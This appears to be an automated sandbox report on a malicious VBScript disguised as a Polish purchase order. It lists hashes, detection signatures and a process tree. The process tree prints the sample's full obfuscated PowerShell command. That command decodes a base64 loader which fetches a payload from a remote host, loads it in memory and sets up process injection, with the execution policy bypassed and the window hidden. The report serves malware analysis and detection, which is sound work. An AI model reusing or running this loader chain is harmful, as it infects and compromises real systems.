Windows
Analysis Report
Nowe zam#U00f3wienie Roltop.vbs
Overview
General Information
Sample name: | Nowe zam#U00f3wienie Roltop.vbs (renamed because original name is a hash value) |
Original sample name: | Nowe zamówienie Roltop.vbs |
Analysis ID: | 1522478 |
MD5: | 4f593177d0dc7f47a74a20f8d75dacfc |
SHA1: | ec4b127fabf32ce159ae4a093ea30e6f3a85d085 |
SHA256: | c2110d453b7db8bcde1826f213136da46caec8dba656ccad721ad7cb066197f8 |
Tags: | vbs, user-adam_zbadam |
Detection
Score: | 92 |
Range: | 0 - 100 |
Whitelisted: | false |
Confidence: | 100% |
Signatures
Malicious sample detected (through community Yara rule)
VBScript performs obfuscated calls to suspicious functions
Bypasses PowerShell execution policy
Found suspicious powershell code related to unpacking or dynamic code loading
Sigma detected: Base64 Encoded PowerShell Command Detected
Sigma detected: PowerShell Base64 Encoded FromBase64String Cmdlet
Sigma detected: WScript or CScript Dropper
Suspicious execution chain found
Suspicious powershell command line found
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Wscript starts Powershell (via cmd or directly)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Java / VBScript file with very long strings (likely obfuscated code)
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sigma detected: Change PowerShell Policies to an Insecure Level
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara signature match
Classification
- System is w10x64
- wscript.exe (PID: 7440, cmdline: `C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Nowe zam#U00f3wienie Roltop.vbs"`, MD5: A47CBE969EA935BDD3AB568BB126BC80)
- powershell.exe (PID: 7492, cmdline: `"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCgnSFpUJysndXJsID0gdHBhaCcrJ3R0cCcrJ3M6JysnLy9yYXcuZycrJ2l0aHVidScrJ3MnKydlcmNvJysnbnQnKydlbnQuJysnY29tJysnL05vRCcrJ2V0ZWN0JysnTycrJ24vTm8nKydEZScrJ3RlY3RPbi9yZWZzL2hlYWRzL21haW4vRGV0YWhOb3RoLScrJ1YudHh0dHAnKydhJysnOyBIJysnWicrJ1RiYScrJ3NlJysnNicrJzRDb24nKyd0ZW50ID0nKycgKE5ldy1PYicrJ2plY3QgJysnU3lzdGUnKydtJysnLk5ldC4nKydXZScrJ2JDbGllbnQnKycpLkRvd25sb2FkU3RyaW5nJysnKCcrJ0haVHVyJysnbCk7IEhaVGJpbmFyeUMnKydvbnRlbnQnKycgJysnPSAnKydbU3lzdGVtLicrJ0NvbnYnKydlJysncnQnKyddOicrJzpGcm9tJysnQicrJ2FzZTY0U3QnKydyaW4nKydnKEgnKydaVGJhc2U2JysnNENvbicrJ3RlbnQnKycpOyAnKydIWlRhc3NlbWJseSA9ICcrJ1snKydSZScrJ2YnKydsZWN0JysnaW9uLicrJ0FzJysnc2UnKydtYicrJ2x5XScrJzo6TG9hZChIWlRiJysnaW5hcnlDb24nKyd0ZScrJ24nKyd0KTsgW2RubGliLklPLkhvbWVdOjpWQUkoJysnNGRNMC9FJysnVDNQJysnTS9kL2VlLmV0JysncycrJ2FwLy8nKyc6cycrJ3B0dGg0JysnZE0sJysnIDRkTScrJ2Rlc2F0JysnaScrJ3ZhJysnZG80ZE0sIDRkTWRlcycrJ2F0aXZhJysnZG80JysnZE0nKycsJysnIDRkTWRlc2F0aXYnKydhJysnZG80JysnZE0nKycsIDRkTUFkZEknKyduJysnUCcrJ3JvY2UnKydzczMyNGRofficiosidadeCcrJyAnKyc0ZE0nKyc0JysnZE0nKycsNGRNJysnNGQnKydNKScpIC1yRVBMYUNlICdIWlQnLFtDSGFSXTM2ICAtckVQTGFDZSAnNGRNJyxbQ0hhUl0zNCAtY3JFUExhQ2UgJ3RwYScsW0NIYVJdMzkpfCAuICggJHBzSG9NRVsyMV0rJHBzaE9NRVszNF0rJ1gnKQ==';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD`, MD5: 04029E121A0CFA5991749937DD22A1D9)
- conhost.exe (PID: 7500, cmdline: `C:\Windows\system32\conhost.exe 0xffffffff -ForceV1`, MD5: 0D698AF330FD17BEE3BF90011D49251D)
- powershell.exe (PID: 7636, cmdline: `"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command`, MD5: 04029E121A0CFA5991749937DD22A1D9)
- cleanup
No configs have been found
Source | Rule | Description | Author | Strings |
---|---|---|---|---|
 | INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC | Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution | ditekSHen | |

System Summary
Source: | |
Author: | Florian Roth (Nextron Systems) |